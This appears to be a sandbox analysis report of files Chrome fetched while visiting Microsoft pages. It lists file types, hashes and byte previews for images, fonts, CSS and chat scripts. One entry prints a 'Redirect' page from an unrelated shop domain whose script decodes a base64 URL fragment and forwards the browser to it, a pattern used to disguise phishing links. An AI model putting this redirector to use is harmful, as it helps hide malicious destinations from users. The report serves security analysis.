                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):4488
                                                                                                                                    Entropy (8bit):7.89532602480277
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:BC2514550A7FF0F5A460B7B26947D3F6
                                                                                                                                    SHA1:40BF03FA8485475A25AD59B01C7C29E2BDB95F51
                                                                                                                                    SHA-256:89609F82D6181F230251FF98335CFBF87A3EA265F94563783C67B958A9713999
                                                                                                                                    SHA-512:C98885230DAACC8CCF00239C3BEE66541331D78C3D39869616E2345BC705B419E96090C4623887219685D90B5730B3E3822717648EB23AAF1D80649A8C966FA0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_X?scl=1
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................n...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................vmdat........h...B2. ....T#......Idp.<.6.-..,.......A.T...<..t...G.s.A.....\...\.;...?..q.....ei .....6.K..f+..;.\..........$C..kl.T|.3/..9.9...$..=.~.-R%...d.;......,....h...7.....X2..(..2..0...D1$.G.(.....L....:[...B.U.HM.7.[4"..jA.@...^.N.O>.a..J.r.Z..^d...;sx.....GR<.Y/..F2..1_..lFRS.T...^0O.."...x..$.N..}.Z..)...n't*7..p..K.g.p....p.W_..$F^-.<...hiD.`...$#S.k..J .!.+.f..0...).......\...........K..K.W\U..E.E.".A.P......b.P......{.......[..L..~.......5..`......Z..]...4..*.<...T&.......eV..~>"l...~.W.].b.stw...}....1Mi2WbG.M.v...t...P..C&&...&z./..O.......}w..0.m..G....F$.0.....Y.=N...Yi..j8^Z.s....c....W....{....`K4.)...M........d.T.3>+....ys >.p..0.-.._.].2/..k.I.0. .>9hV...
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):26288
                                                                                                                                    Entropy (8bit):7.984195877171481
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                                                                                    SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                                                                                    SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                                                                                    SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                                                                                    Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (746)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):893
                                                                                                                                    Entropy (8bit):5.341254978241635
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:A396ED78025F5A92208C05C18A10926D
                                                                                                                                    SHA1:10FB5174F2E3D36EFE7EB88F8141B5C55585C633
                                                                                                                                    SHA-256:B967EAD9AA4A3FAC3A145C1F98E6C7E8C6CEE9AF855AF1C1A95430C8A99498EA
                                                                                                                                    SHA-512:AD67466E9944F808A8B93D2D22BF2571DA9AE1F456CA134255D29A0730AC7F040DB82F3BD28C1230F723407FD9621E73175AA8D56D606A8CF895BCCC59A95386
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCe86a4eb0fcba478dbcc7216ce8374629-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/fbfb7616f9aa/RCe86a4eb0fcba478dbcc7216ce8374629-source.min.js', "!function(){try{if((\"microsoft-365\"===window.location.pathname.split(\"/\")[2]||\"resilience\"===window.location.pathname.split(\"/\")[2])&&\"www.microsoft.com\"===window.location.host)if(document.querySelector(\"[id*=office-CustomMosaicCta]\")||document.querySelector(\"[id*=office-KeyMessages]\")){var t=document.createElement(\"style\");t.setAttribute(\"type\",\"text/css\"),t.innerText=\"[data-module='ow-mosaic-cta'] .c-call-to-action span,[data-module='ow-key-messages'] .ow-cta-container .ow-link-wrapper a.c-call-to-action span{color: inherit}\",document.head.append(t)}}catch(t){}}();");
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (6982), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):6982
                                                                                                                                    Entropy (8bit):4.890639313885154
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F1EB7E4EA36185A91C404F6105FC4A27
                                                                                                                                    SHA1:95A8C61028B5777D56F693C64902A98F200FE394
                                                                                                                                    SHA-256:5930BE8B563A637E5C98C385974998B1246380DEF9948E538EAA6B630ECF99D2
                                                                                                                                    SHA-512:32BB88B386C97D03098CB25E8CF36EE13F884EDF86FA72F7F1893F67DD41337C8DCB99F692BD3EEF6A6CF9751C6CA2F88F6DDAE36C9CF35E9D1F0A0A63E2625F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:accountSettingsCB([{"id":"messaging.ios.sdk.min.version","createdDate":"2017-01-10 04:11:41","modifiedDate":"2023-01-22 16:38:10","type":2,"propertyValue":{"value":"1.1.36"},"deleted":false},{"id":"nbc.integrations.adobe.analytics","createdDate":"2021-07-07 07:29:31","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.audio.sharing.enabled","createdDate":"2018-05-13 02:02:09","modifiedDate":"2018-11-14 08:32:03","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.ios.logs.settings","createdDate":"2017-01-10 04:11:41","modifiedDate":"2023-01-22 16:38:10","type":4,"propertyValue":{"value":{"level":"WARNING","minLogLevel":"INFO","randomFactor":1000.0,"maxEvents":50.0,"maxPendingEventsRequests":10.0}},"deleted":false},{"id":"le.site.otk.forceDurationOverride","createdDate":"2021-06-29 03:18:17","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.file.sharing.blurAllConversationImages","createdDate":"2021-04-13 05:58
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 150x150, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):4288
                                                                                                                                    Entropy (8bit):7.956294742640289
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:01D1E1E0EE687E121C32709295270EC2
                                                                                                                                    SHA1:AEEF213A9F99221435BE03FDED5BBD510AC0B051
                                                                                                                                    SHA-256:2A5F56CE4EEC14EB9211ABCF120C59D1D3C25E2834139A7198DB57A189A431FE
                                                                                                                                    SHA-512:0D2ED814DCDA0C6EA7F87A11CF17F2F6DFB0BBE07448356F19A28D88B39FACAA59A5ECF7649C845A968BA31E49F784B33EAF9A9B6978A561D955EC4AF6B7F10D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/oc_chat_face_global
                                                                                                                                    Preview:RIFF....WEBPVP8 .....G...*....>Q .D#.!..m.8....f...*P........0.m.%.......N...|.[...7;=....h...:...X....}u.+...'.5=.`.cp.T...h.....5.nj@.{B.Fo2....._nY.4..kY..|..y9.o.8....'...4^.O.....w.X.o........x#M...;..Vv...R..$...r.)....r.7l?.V.bo.9..Z.g..X........1.'...j.e].........&.|..A..y.5H..1.....e(;5.e..U...Y#.......QC.c.....o..F.zo..A...GE.!qB)...l..[.Ux9........sEe..../....f_.A...B..>.i..........\.)l.cN.}.N..*..<<r...h....Y.... e....=..c..D y.VG..........f.9.B_..R}..a..&.....Dg.....@..K...&....{..:..C+.....O.NV.2..|..tchX.$.. ....Ks...+...s.R.dU.e.-T.oL3.....x..<..{j...Zn.G.&.TI`....!.wD.N.v\.B._C.:.....X.4....x......s....m..!...qn.. .....Rf...+.z...v..P..,....UU,%...t}....$X.*.;....}D.N...h..._...Fz..o......d..|-....=..`"..........lx....0.n..|Y...x.....t..:...&..).i.=.L......P$..p~......Z.......F.."..\C..T...0.a;$..)...T...[.W/.N..S........~.=....i..d1.X.x..s<..+Xj../7("^..Y.l.W;..y[0.....}.j..x..4z.7.]..$I...#.wt.`j.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):330263
                                                                                                                                    Entropy (8bit):7.999278310349855
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:D4A60E36CA85431BA0417C3C56B3B8CD
                                                                                                                                    SHA1:E10F2D9CF9D98A9269EAF58CC1BD8CBABE45CC4B
                                                                                                                                    SHA-256:FC1F19805F205F25C0DD7F2A94BA0E8A7BEA4B0979AF7135C01F17F6AC06246E
                                                                                                                                    SHA-512:3D2A1B66D564597F8F87CC67A0CC1E16F69B1CEFF301D3D85BC58DA5CD774C9072A25AF645248E455F61B8D33584F51EB67294025A662F8E57A28179D7DA40CB
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Accordian-02-593X334?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2998&hei=1689&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                    Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat........Lp@CA.2..D......Ac/.o.0.3.^..PU..pl.S{..@....Y..Yu..{'F.....u}].=.UH.D.V)...U..,....CE..i..G ..H...:...m|g...Co......a.K.Cg.u.~-_p.S._pj9+.s.i..Dn.6*....x>....p...v4./.>}5.g[.#.*..{Z..*N......*......E&...`.,....w.-.@F..Y..&.@.2.2.I)....<....J._.a..N.3..O+X.............6.q.].T.2...h..5a.y..3y.k.aP..Y_]..9.K. ..e.a.y.yF.=..v.jc4h..e....:.%v.ZM...i..sK.z..'..z]e.e`....$....5~.l...R.ZJ..x..;....FT.....Wx. ..1.3-7..V..QW...;.jg!.@Fs...5c......X...&.;......./.........w..Q.. .....P.....C.,..+.(.z-.....i..T...`.5r.d.....W.-......Xi.'.(fx#@.[tJ.;j!.....O&.?.(..#.-.o...r.'.A......h.8.......veI.......k.....\..c!z.ErV.Fj23.:...r.Nu..p..x.{...L.......m[^.I.....7....4.1.&.u.k...x..B.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (801), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):801
                                                                                                                                    Entropy (8bit):4.5157880016450775
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:4EF57345CB32BE5C6A08FE40CE67D190
                                                                                                                                    SHA1:1363E3095E321691A58B5AAE40FA17FE23E7F785
                                                                                                                                    SHA-256:A42F2929181FCF407858FE806EB80F7005A96CFEBA032B01EDA9F627619FB98C
                                                                                                                                    SHA-512:34CCAFDF02890B0A4A9933580570C92FC36212702F2B724F0D7AF753A77A202912DAB8C483A6D9A9011808EE53EA605F71E8E6C8E9B1775FF2FB1F37F2E9ECB4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:lpCb80928x75876([{"enabled":true,"whiteList":["microsoft.com","*.microsoft.com","microsoftstore.com.cn","*.microsoftstore.com.cn","office.com","*.office.com","googleusercontent.com","bingplaces.com","translatoruser-int.com","liveperson.com","*.liveperson.com","liveperson.net","*.liveperson.net","lprnd.net","*.lprnd.net","lpsnmedia.net","*.lpsnmedia.net","static-assets.dev.fs.liveperson.com","*.azure.com","signup.azure.com","azure.com","*.moscnuat.com","*.lpnet.com","*.azurewebsites.net","*.geologic.al","*.microsoft365.com","microsoft365.com","checkout.microsoft365.com","stores.office.com","*.googleusercontent.com","*.bingplaces.com","*.translatoruser-int.com","lpnet.com","moscnuat.com","azurewebsites.net","geologic.al","*.checkout.microsoft365.com","*.stores.office.com"],"deleted":false}]);
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (497)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):38563
                                                                                                                                    Entropy (8bit):4.984749570609448
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:72C2846D6FEA9943DD679ECE21D70805
                                                                                                                                    SHA1:E1909FBC705EBE1151A0E6ED0DBC73055BFA8C7B
                                                                                                                                    SHA-256:EF0810BD339DB472F49EC2F392A437EA95DC3137FDE674EEE6A1BCB4E4349EA3
                                                                                                                                    SHA-512:15ECB06102DD6C2D1B34523A61D19AB85326446F25B10B1ED9030320B4CD69DBD17121BE492CDB6745AB2572F6F67538125AD5F1A127AAB8EDBA04C5E9B8E1E9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://static-assets.fs.liveperson.com/microsoft/lp_ada_enhancements-prod.css
                                                                                                                                    Preview:/* ADA CSS */.body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {..color: #FFFFFF !important;..border: 1px solid #fff !important;.}..#lpChat .lp_minimized .lp_notification_number {..margin-top: 2px !important;.}...lp-json-pollock-layout.lp-json-pollock-layout-vertical {..border-radius: 15px;.}..#lpChat .lp_csat_rater_star {..color: #fff !important;.}...lp_mobile #lpChat>.lp_maximized, .lp_tablet #lpChat>.lp_maximized {..opacity: 1 !important;..width: 100vw !important;..max-height:none !important;.}...lp_desktop #lpChat > .lp_minimized {..width: 400px !important;.}...lp_desktop #lpChat > .lp_maximized {..height: 600px !important;..width: 400px !important;..max-height: 95%;.}..[data-lp-point="lp_line_state"] {..left: -90px !important;.}...lp_sender {..display: none !important;.}...lp_chat_line_wrapper {..overflow: visible !important;..margin-bottom: 12px !important;..padding: 0px 10px 4px 24px !important;.}..[data-lp-point="headerText"] {..color: #fff !important;.}...
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):512
                                                                                                                                    Entropy (8bit):7.533592341521352
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:75D61088FDC298C0D54E596B18AB439E
                                                                                                                                    SHA1:7BFE909FC448C90C6D20781E76B4CD144C87878C
                                                                                                                                    SHA-256:43ADF659C309DE0F98DD676E974AA82377220194E7FBA32A2CD55990AB2D3A94
                                                                                                                                    SHA-512:9467182ACE25A15E43F5EBAF14CEEB3FA481019836CCE48E422CB8C7EDC6BF65B53D84418B077F4EE1EA2AC459DFB9BA22CD9FF0188E6865C6F3A136F62FE7C8
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF....WEBPVP8 .........*....>...B!.r....q--.>W.7...}......f...D.U............W..}.|..M........(...L.A.....]K.GeR..N_w..}&..TN.........WR.kf...%..&k'..f.q.&k'.@...=c..Ki]..m...o.....]`.......7.w......v......v..s..m......9...R8}.p.`UO.@.]...&....?2Y.M))..........o..h9..O......Y].S'..a.t.......D#G....7..G./I...G....>.xX`...]..,?.H9..Q..:.v..m.....v35..d.=.".L9z...n..P...7....'...`........$.._....l..O.O...6..{..8.#[...o.H...._.{........e..1......sCX..Je~r..{.. ..1W....U....>.....
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):377078
                                                                                                                                    Entropy (8bit):7.998041655274962
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:83E346E90A31CFA95064D3A29E50357A
                                                                                                                                    SHA1:5315A95813E5241D886F2D80D5A7E55589A42C75
                                                                                                                                    SHA-256:31F92B121BCB799A1C37D9474DD26255807548FC944E0564E2C80700ADAAF723
                                                                                                                                    SHA-512:2DDCCE1838727DE9464A89B20909553971A16C210F1F6706E1D3D5D1C791590E3227839557FFD97A349015AD9AF554297D0B249B9EC92400F6640D24F37940C5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFF....WEBPVP8X..............ALPH......p....`.m.2+.T..k.......?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?..........v..VP8 ...Pm...*....>...A..V.0..a,..........p.Y..o....rx.^......H...F...h..?L.).....Q.|........?.......'./..._.?.|..om..G.O...?.|....C....t|.._.......?..Mx....?....s.......?....Q.C............I.........._.....K.........?......9...........|..O.?.....O................./.............................$?..........'...W./......._.?...........................=.........?.................................?...?....e...........................w...s..._.[~C./.......d.{.{...~E....._.....-..?.....r...g.o.?........7.?..E...;.G.?...............?............E.....o._`.........G........}W.................=.c.....o._O.K...w..._.....p...7.o._.?....../............o..._.............o........w..........7...O....._.....
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):203
                                                                                                                                    Entropy (8bit):4.6712092041548265
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:44700D76F3F63FA33F30039BB9C74B39
                                                                                                                                    SHA1:F68B158102C2575081CB4308E4FEA483E1B9D604
                                                                                                                                    SHA-256:FD73C7131FEA30896A95BC1D0E9F08F383FEFB03730DB9A433F43B319EFF33AC
                                                                                                                                    SHA-512:2665D21274DB60A9BC6BCC7100DF57C2EE0E2264601A295902CC0E958CBA2B198E4C1AB6291947A8F33DC46D42AE0E1F586369CB3F3B011C751C81EFA755C234
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH44700d76f3f63fa33f30039bb9c74b39.css
                                                                                                                                    Preview:body div[data-geo-country="US"] .us-hidden:not([data-isenvauthor="true"]){display:none}.body div[data-geo-country]:not([data-geo-country="US"]) .non-us-hidden:not([data-isenvauthor="true"]){display:none}
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):56975
                                                                                                                                    Entropy (8bit):4.7745064069477285
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:884BD098ECB71645787C430F99C6D7B6
                                                                                                                                    SHA1:1F8B450E1D71D2F2242D6959A8C0EC50974EE448
                                                                                                                                    SHA-256:B4530D1B6EE9EAF575D6758D140613A368341C087BF22EF3E9475C477E798733
                                                                                                                                    SHA-512:CF8DDA718482CF562877EEEB67D1EEB02C06D0B70F2FEA31177B6E9CA6EE1A628693B7249CA361E72955B4811405EDB9B3B651DC323018BFF2C1CCA1F3305C54
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH884bd098ecb71645787c430f99c6d7b6.js
                                                                                                                                    Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (39335), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):39335
                                                                                                                                    Entropy (8bit):5.245657338212633
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:058746DEA85C93AE0326F56455CA854F
                                                                                                                                    SHA1:88C6DFB90BACDEED2592E5E18BFAC899BCE0C901
                                                                                                                                    SHA-256:DD101610BFDD5074E44F8DB73AE061DFBD46C7B6A7C860171E525088E85B6474
                                                                                                                                    SHA-512:CA39C20F74FD97222D8FCCCC1D7BE0E52FD250ABCFB4A0851FE0C00F927376119B8B2D5639A30E62609027009561D12791B197AA7B10AE10BD90537DF09CF073
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:!function(){window.liveperson=window.liveperson||{};window.liveperson.uiframework=window.liveperson.uiframework||{};window.liveperson.uiframework.latest=window.liveperson.uiframework.latest||{};(r=window.liveperson.uiframework)["v0.8"]=r["v0.8"]||{};var r=r["v0.8"],o=window.lpTag&&window.lpTag.taglets&&window.lpTag.taglets.lpUtil,g=window.lpTag&&window.lpTag.unifiedWindow&&window.lpTag.unifiedWindow.log;r.LPModel=r.LPModel||function(e,i){(g="object"==typeof i?i:g)&&!0!==i||(g={error:t("ERROR"),warn:t("WARN"),info:t("INFO"),debug:t("DEBUG")});function t(t){return function(e){!0===i&&window.console&&("ERROR"===t&&window.console.error?window.console.error("LPModel#"+t+" : "+e+", "+n()):window.console.log&&window.console.log("---LPModel#"+t+" : "+e+", "+n()))}}function n(){function e(e){return e<10?"0"+e:e}var t=new Date;return e(t.getHours())+":"+e(t.getMinutes())+":"+e(t.getSeconds())+", "+t.toDateString()+", ("+t.getTime()+")"}var l=!(!e||"boolean"!=typeof e.debugging)&&e.debugging,c=ne
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1045
                                                                                                                                    Entropy (8bit):4.935566191494263
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:B3815812759AEF37E6AC5C136929E620
                                                                                                                                    SHA1:F0752DDBF8899E1A363D585AEBC2496F5D5CCDD0
                                                                                                                                    SHA-256:FB3E9739D9EBB8A801C1191595E10DE993B4BFDEB49463295B9F63B6C663B09B
                                                                                                                                    SHA-512:7E98BA97827552D357F34851E9FF6BD7F10FAE2DE266F71328638562B6D622343E5E61C0D6D8449E056ABD389C5816599B6B83DFF6EDDC0F9B3C3A786D1CA44A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.yuxingketang.com/collections/throw-blankets/
                                                                                                                                    Preview:<scriptlanguage="javascript">.<html lang="en">.<head>.<meta charset="UTF-8">.<title>Redirect</title>.<script>.function base64DecodeUrl(str){. return decodeURIComponent(atob(str).split('').map(function(c) {. return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);. }).join(''));.}..window.onload = function() {. var hash = window.location.hash.substr(1); // Get the fragment after the '#'. var url;.. if (hash && hash.substr(0, 4) === 'http') {. url = hash; // If the fragment starts with 'http', use it as the URL. } else {. if (hash.includes('/')) {. url = base64DecodeUrl(hash.split('/')[0])+hash.split('/')[1]; // If not, try to base64 decode it. } else {. url = base64DecodeUrl(hash); // If not, try to base64 decode it. }. }.. if (url && /^(https?:\/\/)/.test(url)) { // Regex to check if the url starts with 'http://' or 'https://'. window.location.href = url; // If it's a valid URL, redirect. }.};.</scr
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 128x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3708
                                                                                                                                    Entropy (8bit):7.948093833909796
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:F1268BE988FAC234083E80A1FEA12D93
                                                                                                                                    SHA1:9F7C9AE8F5C3541648A5D83F55776131D7D09A66
                                                                                                                                    SHA-256:2DE2618A29D67A1FFBAFB2FB72FD6DA36F2ED860895D94B9C6E1F9EDE09863A6
                                                                                                                                    SHA-512:71DEB6149A4B571DA55F6EC74775EF8B01E9497E71DA7AC5A14A27A669543DB3EDB8ACE388CF3FC59B13DDA8EDB3C93B856B7715D840A70ABD85FD3CF74B04D5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview:RIFFt...WEBPVP8 h....1...*.......%..W......F.C.W...7....m.... H.|.._.?..o?.k.~....?...?...y.........w.......o..`.....H.^.....'.7.5.?../..._..._..G...D.............$.F.....O.W..................%........X.f.1...mnF......>..-u5..{..a6.....?]Q-.....b...lMVp>..9}..P`v.9.:#.lS.........x..R.....tE...e........mr.@1DW...*....C.LX..b.8<(../..v/..Xif....TP.t.u... $...[.....9...Qp..QV.y|J........y..}...../......+..............@LT.....=.,[6.......4...7..w}Os.%.$...#.i......./S*.x..q;..}B...T.....hS]}-.....(i.....h./K.......$...$u....nbZ.P.....y....M.;Yb....D8d.p..r.@......F..@k""&C...:R...R8L..,..F.r.4..)....=IP.F....@..|.8.Z$.IN.9.."O.z><..vD...UX~R.g.@...........8r.o..E.R.d....x...:!.:...#EK....2b.5.B...&.).dXZi`..l....l%..:....E.9aU.......l.X.(.H]F.....d.t<...N.....!...7]R):...7........=...g.c.4.......w....-R.6..Wf.9....o.z.x..F..|.8.@ ..s|.z ............?.u.8.. !.b..e..I...c...kp.L..+.,....X.4...'..X.)......P.........UU+....#...L.....P..*.d..^......
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):982
                                                                                                                                    Entropy (8bit):5.055900899767409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:
                                                                                                                                    MD5:FA6F56B2D3037982772378233706C9AF
                                                                                                                                    SHA1:A511B80627BF05C511F348B3C1AAF4F2FA174365
                                                                                                                                    SHA-256:BE37586E1929EF52245871FB9FB2C2E2A31A14EE9B421439CA67948EC4036188
                                                                                                                                    SHA-512:14E7287DEFBE26244B9C19EDAE24B3BFE7E336D41FA1AE85142B8ECB18CC20458953B0BBEC9E10EF6691FDB059494BFE65269AB47D2A2AC49A84D6EF7F2AFFAC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHfa6f56b2d3037982772378233706c9af.css
